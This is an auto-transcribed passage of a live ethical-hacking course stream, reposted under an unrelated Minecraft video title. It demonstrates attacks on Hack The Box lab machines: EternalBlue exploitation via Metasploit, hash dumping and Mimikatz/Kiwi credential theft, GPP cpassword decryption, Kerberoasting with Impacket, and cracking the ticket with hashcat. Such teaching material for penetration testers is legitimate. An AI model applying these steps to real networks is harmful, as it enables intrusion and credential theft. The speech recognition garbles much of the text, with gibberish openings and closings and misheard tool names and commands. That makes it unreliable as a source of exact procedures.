Hey the Lacroix qiyam start off let’s go million times per micrometer to make the Hong Kong Kong item tip of a wedge bond an AP and Simon Baldwin and Sciences influence I feel on via Sean highlighted in Africa network hacking course for cyber mentor every game over time by Vegetable time fifteen sure and this in context and people in the foreign shown to the people in the video shown on the onion so that’s it fits in school yeah mr. burnshaw you know done without further ado really Sony’s money talk and if you’re running nessus necess is gonna Do this for you but you should always do this anyway this is a backup check is if you see SMB open on a network you should be checking to see if it is exploitable or at least potentially vulnerable to MS 1701 zero this is like I said one of the Most common and easiest attacks in order to get the system okay so here’s the script we ran and map – P n 4 4 4 5 is script and then it spits out hey looks like it’s vulnerable to this remote code execution right and if we were to rescan We would probably see more of being map this time around and we did get it back are ok we actually got back our skin for active as well cool so we’ve got this skin here saying it’s vulnerable so at this point if we’re a pen tester we’ve Got a couple options depending on what the what the client has told us right the client says hey you have free rein go ahead and do whatever you want or if the client says hey you know what before you run any crazy exploits please let me know because an exploit like this may Actually take down the system it may mess things up depending on what the system is doing this some sort of critical infrastructure where it can’t go down you might not want around the exploit right so it’s important to know on these these RCE exploits that you’re probably better off being safe than sorry And you don’t want to take something down that’s critical and have a client to stop it so you call the fine up the client says okay fire away and that’s kind of where we’re at here with this exploit so if we come in and we say let’s go back in the Metasploit and I don’t think I’m thinking guys this stream is not going to make it to the live cut so what we’re gonna do I’m probably just going to piece together self old by old streams did I have on these topics and draw them in as a as they you should have been There for the live [ __ ] show and we’ll we’ll just call this a special night so oh yeah oh my god [Applause] exploit Windows SMB and the 1701 zero eternal blue right see just copy this bad boy and paste it this is one beauty still moving we’re Gonna set the our hose to 1040 and then we are gonna run this now a couple things to note first thing note is this might not work on the first try or the second try it might take a few tries to actually work you know this is very very Tricky exploit to get running of course it runs on the first time gets us win next thing to know it puts us right into a command shell so if you are a meterpreter fanboy like I am this is not the best situation we can improve upon this right so this is just a Generic payload we can say Who am I and it puts us in as Authority system which is great but let’s control see out of this and just say yes okay so let’s say ah bones again this time we can see the payload options as generic shell reverse TCP and we’re just gonna say how let me say show payloads and see what’s available to us we’ve got 43 payloads but I’m gonna use at windows 64-bit meterpreter so let’s just say set payload windows 64 meterpreter and then let’s just double tap to see our options Reverse TCP is probably the best bet here always good to double check our options as well once we set the payload we want to make sure that our l host is still holding true our L port is also still holding true sometimes it resets these down to nothing or if you’ve Gotten an exploit running which is sometimes the case already on a port it might default to this for four for four you might want to set it something else all right so now let’s go ahead and run this again let’s see if we get lucky Twice in a row on the first fire and sometimes we can crash the machine especially if there’s a bunch of us on the same network doing this fingers crossed that we don’t do that and we may fail our first one here so we failed the first one that’s okay It’s gonna try again with different groom allocations and see if it works there’s still a ma there’s still an ama alright we had a session so this is a two-point concept through both of my points don’t worry if it fails you might even get it failing three times through You might need to rerun it again so rerun it a couple of times it’s a false positive and is failing and also second point here is we can always improve our shellcode on these 64-bit machines so now we’ve gotten richer pure shell to say sis info on this alright We’ve got the 64-bit interpreter we’ve got the 64-bit architectures perfect and now we can also look around one of my favorite things to do is to stay hash down okay we just dumped the hashes for the administrator and the Harris account so like we talked about last week I Would take these hashes and try to pass them around right we can crack map exec we can try with PS exec in the network see if we get in anywhere so definitely definitely critical one of the you know first experiences I had on a pen test would with eternal blue was getting a Hash dump like this and then passing the administrator hash and getting access to pretty much every machine because they were cloning machine so it’s always worth trying practic sec and passing the hashes around like we did last week to see where you have access to Oops to of course to let shell into this and we can look around the file system you know we we could CD to whoever users and then say there and see who’s in here okay administrators in here who does administrator what do they have on their folders right there okay maybe Go to the documents you know you’ll come up with with ways to search for sensitive files and have keywords and stuff like that but these are the things you’re looking for like what can I find on the system what kind of access do I have you want to see you know who it’s Talking to you what the ARP table looks like of course there’s not going to be another one in this network that’s chained to but you want to see that through the art you want to say Ralph print and see what the routing table looks like Nets that’s another good one To look at so if we go that’s that – hey you know we can look at all the connections that are coming in and going out right so we talked about it a little bit last week about dual homed two machines for example if this PC for some Reason had two Nicks and one NIC was sitting on a 10 10 10 network and the other was sitting on 10.10 mm for example we might be able to see that the 10.10 that 11 is talking to a whole different network that we had no access To and we’re gonna talk about that in more depth next week when we talk about pivoting so that’s a pivoting situation we want to go into a you know a different network how will we investigate these higher ports so these higher ports if you look at what we’re doing like the four four Four four here those are established from us connecting so we open the port on their end these other ones who’s to say what they are we’d have to see you see a lot of high ports like this going out like four four three in other you know the internet addresses these Could be other people’s shells for all we know they may have just put in like other you know it’s hard to say without being able to to go into the machine so we want to look at those things of course control see we can load some extra modules as well we can load Incognito which is my favorite and we just say list tokens – you for user okay and if we’re on a domain network we may catch a domain administrator who had logged into this account remember we talked about the tokens and how they worked last week obviously there’s no Domain account here to login to we’re not doing that but something to look for if we’re using 64-bit architecture we can load Kiwi Kiwis awesome one of the best commands and creds all again we talked about this last week no creds here but we type in help There’s more than just the creds all we can talk creds Kerberos golden ticket attacks come through this we do Wi-Fi list that there was Wi-Fi profiles so there’s a lot of things that we can we can get just off of Kiwi so these are some things to look for things we’ve Talked about it should all be coming together right this is just a very very simple exploit but the post exploitation is really the most important like we we own this machine in two seconds and there’s a reason it’s on top of my list like I said it’s on most major networks Since we owned it so fast we need to be able to make sure we enumerate around everywhere right we’re looking for sensitive files those hashes work and those hashes lead us can we impersonate a domain admin what kind of net commands can we get access to etc so every little Computer has a piece to play in the final picture it’s just seeing how that piece fits into the puzzle what’s the difference between me me cats and Kiwi Kiwi is a 32-bit right let me say load or sorry nimi cats is 32-bit you say load me me cats it’s gonna say Hey you’re loading on to newer architecture right OS so we want to actually use it on some older architecture Kiwi is the newer and better me me cats alright you was always but so we’re gonna call this one a day this one was just gonna be a 20 minute box that’s Turned into 45 minutes again I’m very sorry guys even I struggle you know so let’s go ahead and kill this lunch and let’s go ahead and talk about the results from this machine here called it active now active is one of the favorite boxes I have encountered in the hack the Box labs because it is realistic it’s very realistic so if we look at it there are some signs that what we’re up against is likely a domain controller you can see that it’s running DNS it’s got Kerberos which is an authentication system we’ve got 139 open we’ve got LDAP of the four active Directory right there should be a pretty big sign that we’re running a domain and the domain here is active that htb we can go through all the ports here it’s very very similar that like I said of a domain controller so when we see this we Look down here SMB and common to domain controllers SMB signing is enabled and required most of the SMB relay or the ntlm relay is done other than domain controllers sometimes you’re lucky and it’s turned off but Microsoft got smart and enabled that for Windows Server I don’t even know what versions onward but It’s as of late been running this just fine so this looks like 2008 so god knows how long it’s been doing that and other things that we could look at right if we we can maybe dump LDAP in for me that’s a little bit more advanced and Outside of the scope I’ve seen that done in some hack the box without credentials but typically you’re not gonna have access to that without credentials but that’s something to think about and to study like if you get this box back on an assessment in say for example the Only box you’re gonna want to look through each single one of these ports and say what’s interesting to me right the first thing that’s always interesting and in my behalf is always four or five and 139 because the more time you spend in pen testing the more Time you have to realize that SMB is behind a ton of exploits so do note that looks like they may have some sort of HTTP API going on I would investigate everything that says it’s open and probably not TCP wrapped so definitely worth looking into so here First thing we’re going to look into is going to be four four five so we’re gonna do is I’m going to go in and use a tool called SMB client so it’s gonna look something like this we’re just gonna say SMB client we’re gonna do – el I think it stands for list don’t ask me what it stands for I don’t really know and we’re gonna list out the contents of the directory it’s gonna ask our password we’re gonna try hitting Enter and it says anonymous login successful this is a finding so this finding is That we shouldn’t have an animus login right you shouldn’t know what sort of SMB shares are out there so we’ve got these these shares here we’re able to see those we would absolutely list this on a report now what we can do with these shares depends on how critical you Know this tiny becomes right now it’s just a low finding close up the anonymous login so from here we’d want to see what folders we can actually connect to now the juiciest folders might be something like this see share or the remote admin we can see If we can connect to those folders so to connect to a folder we just say SMB client we do the character escaping just like I’m doing here and we’ll just say something like admin dollar sign and try to connect hit enter and then says access denied even though we have Anonymous login successful so I’m gonna cheat a little bit and tell you that the one that works here is the replication folder we hit enter enter again we are successful okay so we have an SMB login here we are in this replication folder now if we type help we can see a full List of commands of what we can do it’s very very similar to Linux we can say LS and see what’s in here okay it looks like there’s a folder called active htb we could say CD active to HGV LS again okay policies scripts DFS are private and it’s called replication so it looks Like it’s probably a backup of something right and a backup of what who knows but we can figure that out for ourselves let CD back then a share instead of digging through all these files there’s an easier way to do this so let’s just say we want to download all the files And folders that are here what we’re gonna want to do that with something called and get but before we just do an EM get we’re gonna say recurse on because we want to deal with all the folders recursively and to save some time we’re just going to turn off Prompts so we’re just gonna save crumbed off and now all we have to say is m get with an asterisk like this and it’s gonna start downloading stuff okay and we only grabbed like eight files here if we look through the files that we’re grabbing looks like we grab GP cheetah ini GPE to ienai a dot INF file and then I see okay I see this group’s XML this is something that is really well known to me and this is something that is likely going to be pay dirt for us so let’s explore what’s in The group’s XML and then we’ll talk about why it’s so relevant so I’m just gonna say bye okay I guess there’s no by here just ctrl C if we LS in this folder or we say CD I think should just be active it should have the same folder structure so stay active policies Actually this is probably better to just do in a GUI form document download active and we say it was policies policies three-one be machine preferences groups and they open up this groups to XML okay so it might be a little hard to see so let’s talk about what this GPP is this Groups that XML is so groups XML is related to something called GPP it’s also group policy preferences is what it stands for an easy way to remember this on a pen test if you ever listen to rap there’s a song called are you down with OPP well just think to yourself are you Down with GPP and make sure that you search for GBP right so you’ve got this group policy preferences and what it did was it allowed domain admins to create domain policies using embedded credentials right so the credentials are right here in this file you see username active H TV and then We’ve got services TGS here just kick a granting service and we’ll talk about the ticket granting service is here in a second and then you see this thing called the C password this is what we’re after and there’s actually a great article by rapid7 that i’ve got up here it’s called Pentesting the real world group policy pwnage it talks a little bit about GPP and what it does probably better than words i could put it in too but basically you were able to store the username and password you created it right for for an account to do some Action you can say file-sharing or whatever it is do group policy this was up until a few years ago so these key is just stored in the sysvol folder right and what you can do is there’s actually a Metasploit module which i want to show you we won’t use it tonight because we Have no need we’ve already got the file but I run this on every single internal assessment and you will not believe how many times the C password or the DPP book it just shows right up so if you search TTP just the groups I XML file Exist on an active domain it is just on some active domains this is for older domains but sometimes even when they migrate they leave that file in there and we’re gonna talk about that too so if you see the post windows gather credentials so as long as we have some Sort of access on a session we could say use post windows gather credentials GPB look at the options so we need a session right it could be a PS exec whatever session we get once they have a session we can run this we may be able to get The a domain administrator password just from this so very very important to try to run this on any any internal something that you can so another thing to note though we have set this up in the past for clients as what’s called a canary account basically what we’re Doing is we put in an account that has a GP PE or C password and it’s never been used but it is sitting there as a honeypot right so when it attackers in your network and they’re looking for this low-hanging fruit because GPP is low-hanging fruit we say ok they find The file they see the username critter angels and as soon as those username credentials who can activate it then we know an attackers on the network right so just because this is low-hanging fruit your competition might be using it as bait so always think about that as Well but typically on pen test it’s something that we’ve grabbed right away okay so let’s talk about how we can exploit what we just found so let’s open up this file we’ve got the C password here I want you guys if you’re following along to copy the seat password and what We’re gonna do is say GPP decrypt it’s built in to Kali and then we should just be able to paste this password here we get a warning but don’t worry about it the cipher is deprecated so what we’re gonna do is we’re just gonna copy this And we are going to let’s just paste it somewhere that we can have it right okay so what this means now is we have a account we’ve got this domain here active that htb we’ve got this service ticket granting service account here so what can we do with this well we can use Again crack map exec try to push it around right see see what we can do with it we can try to go back into the SMB client try to log in with this account and see if we can get into admin folder you know I could use PS exec on this Machine that was the first thing I’m I do to active was to say okay does this have access to to the share folder and administrative privilege so I try to be as exact exact doesn’t work either but be thinking about the same process for everything you’re doing so PS exec you Know crack map exact etc whatever we can do with these credentials we’re going to try to get in anyway everywhere that we can well we’re in a one box Network right now so another tactic that we’re going to talk about and tactic number four on this list is Kerberos state so we are going to talk about roasting let me minimize everything and bring out my handy-dandy pen so I can explain this as best as I can there’s probably going to be somebody out there who is a domain guru and going to correct me on this because you people Like to correct me all the time when I say something wrong so sorry in advance if I if I miss misquote this right so let’s talk about my best interpretation of what Kerberos thing is and before we can do that let’s talk about Kerberos so Kerberos is just an authentication Protocol right it uses tickets so it’s using tickets as a form of communication and authentication so let’s assume a situation and this is how it typically is that is a huge [ __ ] thing all right let’s clear that let’s try that again all right we’ve got this machine Here this is our server our server is also considered a AEC right it’s a key distribution center because we’re giving out keys all right we also have another computer here we’ll just call that the client right so we’ve got the client and the server well let’s say the server or The client wants to authenticate right so it’s gonna come to server and it’s gonna say hey server you got those tickets can I get a ticket it’s gonna ask for a TGT a ticket granting ticket now the server is going to check the credentials and if the Credentials are good it’s going to send back over encryption which is tgs ticket granting service is going to encrypt a secret key remember key distribution center it’s going to send back a secret key that gets stored on the client so this client has a ticket stored here and told the ticket expires Now let’s add a pawn to this story let’s say that there is a service that we want to connect to right come down here well this call this service and the service could be whatever we want to be sequel week antivirus you name it but let’s just call this a sequel service ok Services have what we call SPNs these are service principle names so to connect as a client we need to ask for permission connect to the service we need to know we say hey ESPN I’ve got my ticket I’m going to take this and can I can I please connect to this sequel Service and we get a session key back from the server if we have the credentials right or the ticket at least to connect so the thing to know about Kerberos tting is that with any valid ticket or TGT we can request for a TGS ticket for this spm so lots of acronyms Right if you’re military former military you’re probably following along just fine but there is a lot of little letters here just know that if we have a valid ticket we can request via the SPN here at least to attempt to get a TGS right so we’re gonna see what that looks Like there’s actually a tool that does that for us how did I do you domain people did I do okay alright let’s pull this back up and this is part of the impact the impacted write the whole thing we’ve been using this entire time what we installed the Beginning I told you would be important this toolkit so impact it is awesome so let’s go ahead and locate what we’re gonna be running it’s called get like a tight get user SP ends you see we have a few the one we installed them game the course was the opt-in packet I’m gonna Use that one so I’m gonna see to opt-in packet examples all right so now we LS there’s a bunch of stuff in here but we’re gonna be using that get user SP n spy we’re just gonna say Python get user s PM dot pi all right first things first We need the account the account was active and it was service ticket granting service right next we need to say dcpip we need to know the IP of the domain controller well lucky for us this is the domain controller and last we need to request the ticket so we’re Going to cross the ticket ah we need a password so we come back in here we copy this guy we paste and we get this wonderful thing back here so we see that we have captured something here for the administrator right we’ve got this long hash and it’s A kr b5 g GS so what can we do with this well we can take this offline and try to crack it and see what happens and we’re gonna do just that so have your handy-dandy hash cats ready I’m going to load mine up now give me one second As I am NOT prepared as you guys are okay so gonna run hash cat we’re gonna say – help we are looking for kr b5 which is 13 100 if I am not mistaken there you go under Network protocol 13100 hero spy TJ s t GS sorry okay so We know our module is 13 100 have you’ve been following along week-to-week you should know how to run hash cat now write the hash cat 64 die he exceed we’re gonna do a module of 13 100 I named this file Kerberos text and all I did was copy this entire line all the Way down the end put it into a file I’m gonna run this to rock you I’ve got a brand-new 20 80 TI that we’re gonna push this through I haven’t actually run any hash cracking on yet so let’s just hit enter and see what happens And it took us not that long at all so we went through where is it 77% of the list and this is 14 million passwords long so that’s pretty good all right so it’s cracked you can see that it’s cracked Ticketmaster 1968 is the credential so We’re gonna take that and I’m going to paste it in here okay and now let’s load up that Metasploit we actually have it loaded what we’re gonna do is we’re just going to search for PS exec we’re going to use exploit windows SMB PS exact Number 11 on my screen if you don’t see it let’s talk options okay so we’ve got SMB domain remember that is active HTV SMB user his administrator that send me a pass is that Ticket Master past be helpful if I hit the word set in front of that Let’s try running it see if we get lucky I’m kind of indifferent on the I never said in our house sorry guys alright let’s try again see if we get lucky okay so it’s like a powershell let’s look at our targets so we’re an automatic let’s try a native upload instead So we see that we authenticated we uploaded the payload it’s creating it’s deleting and it’s hanging let’s try target 3 you might have to go back to target 2 and Frank oh my El house is not good good good job on that one so as pointed out thank you very much The all hosts got pointed to my machine and not not the callee machine or the the IP address that’s here so let’s set the El host if yours did that also set yours I think mine’s 36 oh no it’s 21 now all right so let’s set target back to Two and run again there we go thank you techno bro all right so we’ve got a shell sis info on the shell 64-bit meterpreter 64-bit architecture get the UID we are authority system we have full access on this PC again same concept here right we would load incognito Let’s tokens see what tokens are out there we can do a hash dump dump the hashes pass them around see what information we can get from that this is one of the more realistic boxes like I said in terms of teaching you to two common internal tactics Kerberos things Is obviously one of the more common that’s going to lead you somewhere but AGP PC password is something you should be checking on pretty much every assessment because that does lead to easy win you would be surprised how many companies have their passwords stored or even if they’ve migrated or updated Somewhat in an older password that is similar to what their current password is so any password that you can get is absolutely relevant so with that being said in this stream being all kind of screwed up we still finished at 11 minutes past a jewel so that’s not Terrible I’m going to change my screen over to IRL and we can we can talk shop for as long as you guys want to probably hard stop at ten let’s go ahead and actually just get started my dogs are going crazy that’s awesome I forget what buttons there we go Welcome welcome unless you want to see my pretty face we can do do that there you go I’ll talk to you bad welcome to the last episode of zero to hero we are week 11 you’ve made it to the end so we’re gonna do some quick housekeeping we’re gonna Talk file transfers we’re going to cover some cool little tricks that I like final transferwise maintaining access pivoting and cleanup we are gonna do a lap on pivoting we’re gonna talk maintaining access and clean up and I’ll get into that and the reasonings why then we’re gonna cover legal we’re gonna Cover report writing and finally we’re going to end on career advice so we’ll talk some legal documentation I’ll cover that example report that I put out if you haven’t seen it now some time to talk about it and then I’ll give you my career advice tips etc tip my hat and Sign off so we’ll do QA AMA at the end let’s just go right into the housekeeping so like I said this is the last stream immediately after this dream I’ll be breaking some protocol and I will be uploading the stream on to YouTube there’s 24 hour waiting period Of understanding LOL i’m also going to be putting it on the zero to hero pen testing on the cyber mentor calm so if you’re looking for that respository it’s on there as well the course will be full and it’ll be done tonight 30 minute AMA Two reasons why I am on three and a half hours sleep I want a party so bad with you guys but I’m a flight at six o’clock in the morning as of just a few minutes ago I got a text message thing that they may have cancelled the flight so that’s Great cuz we’ve had this book forever my wife is handling that right now the flight doesn’t say that his cancel online the text message said it was so she’s on the phone doing with Southwest Airlines right now so as of right now potentially leaving in six and morning So I’m drinking my mom’s around three and a half sleep you guys ask me all the time how do I go the work done so they never sleep so don’t don’t be like me definitely try to get some sleep so because of that we’re gonna push the Drinking game into next week next week will this have a super super chill chat what we’ll do is we’ll drink well hack things we’ll have fun I’ll try to take a different topic that we haven’t covered before something a little different and we’ll just have some fun with it So other than that a favor to ask of you guys if you guys are enjoying the course if you enjoyed your journey please do consider leaving me some feedback you could leave it for me on discord on LinkedIn on Twitter I would greatly appreciate that many of you already have And that’s awesome full disclosure I am planning Jannetty to do this course again in a paid version which is just going to include some more updated material it’s gonna have an actual lab built out to where we do begin into it so you guys got the free edition free Edition covers pretty much everything I wanted to be covered the labs it’s gonna be a little bit more upgraded and I would love to use some testimonials if you guys don’t mind that so that’s my only ask of you guys other than that tell a friend say hey you know I I Enjoyed this course you guys should check it on YouTube or whatever that would be great so other than that let’s go ahead and just dive into our lesson so I actually put that in the wrong spot we’re going to talk about answers first then we’ll talk me into any access so if You are looking to take the course the course will have discount for students first responders and military vets military active doesn’t matter you just got to let me know ahead of time and we can work it out it’s through a 20% discount if that’s if you guys want to Retake this book but anyways so let’s go ahead and talk file transfers so tonight we’re going to do file transfers with Linux typically Linux file transfers w get so we’re gonna look at W get and then we’re gonna look at some windows tools we’re going to look at HTTP FTP Metasploit certainly chill sick in the minds already getting ahead of me with okay loiter Jeremy sang must just meet these episodes music gets by oh nice director stuntman Simon SS Minnow yeah but in video full ethical hacking course natural penetration testing for beginners 2019 for the cyber mental Visions of often free code camp dot auction on link is in my Derbyshire bone microts over here is laser : tech artists power server meteor in or moon uptime yoga no guarantee if you’re feeling a good plant up time I owned for feedback ID we must not survive him and his eat Is he a kind man star the same candy here Emma and span vanilla bean when I spawn today IP Anton on concerns I can’t sleep as like you moment on psych of disappeared lesson of T domain zillion Hong Kong winter day yeah often serve account belong the longest not like top Da piedade domain back so does can declare any guarantee on violations vices and adding yarn Zion good advice no does not hiding behind here server by 10 which invert alles klar yeah Dan Simmons in the next episode it is a tower where is unknown it’s done Video Information
This video, titled ‘Minecraft Anarchy #050 – Full Ethical Hacking Course 5/6’, was uploaded by ZillyGurke on 2020-03-08 10:29:03. It has garnered 8 views and 0 likes. The duration of the video is 00:46:17 or 2777 seconds.
Lasergurkenland anarchy server ip: 149.202.127.134:25565 domain: zillyhuhn.com Is a small vanilla Minecraft server without rules. freecodecamp.org talks watched in this video: https://www.youtube.com/watch?v=3Kq1MIfTWCE